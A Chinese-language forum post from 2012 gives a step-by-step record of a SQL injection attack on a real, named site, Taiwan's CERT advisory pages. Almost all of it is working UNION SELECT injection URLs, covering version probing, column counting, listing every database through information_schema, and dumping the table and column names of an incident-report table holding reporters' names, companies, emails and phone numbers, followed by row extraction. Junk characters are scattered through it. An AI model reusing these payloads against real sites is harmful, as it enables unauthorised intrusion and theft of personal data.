1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询+ d7 n$ `6 a. o) C- ?
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解- }; U+ b7 X5 G
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
& j5 B1 \! H" w% i' t3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--; u; e C& o+ Z; I
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
5 M( N% ]8 _+ C$ q/ _! k V4.判断有没有写权限
3 T% C+ X2 }4 W& I9 p: u8 ~; Mhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限/ g$ E, Q# o B
没办法,手动猜表啦9 F7 Q/ g: b5 g' t, D9 d0 d# K
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
8 s5 u; D3 O! B; s9 E2 h但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
$ y" j- b2 F2 chttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
7 _0 Z& S0 w R' ]成功查出所有数据库,国外的黑客就是不一般。数据库如下:8 e; X* E9 l6 Y
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb. C1 D% w. N G; f2 F
6.爆表,爆的是twcert库, s& S) c' k! ^, G& x
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
4 [# B* g$ @. |7 W爆出如下表7 @. p4 J* ?0 z5 i( H
downloadfile,irsys,newsdata,secrpt,secrpt_big5
* I! u& {# C3 N7.爆列名,这次爆的是irsys表8 t+ m! s$ E/ W s- p# z) }! g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--: o- o( C" i1 O1 }
爆出如下列' e+ l3 E( H9 i* x# ^
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status9 k5 ?; r1 E1 r& l u
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。" u1 p0 D' L9 V& o9 V7 p3 o
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
1 ?! G' U8 ^6 T6 ?' f& o" `; P返回是3,说明每个列里有3个地段- G7 T) u- _8 a
9.爆字段内容( e6 Y" {1 l+ B$ z9 [5 a
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--7 H7 {) F; F$ J! V- P- s
爆出name列的第一个字段的内容
5 Q6 e% x( r* T" H+ g, g3 shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--4 N: Z- F3 m4 N" O/ N* D6 J" A
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
分享
支持
反对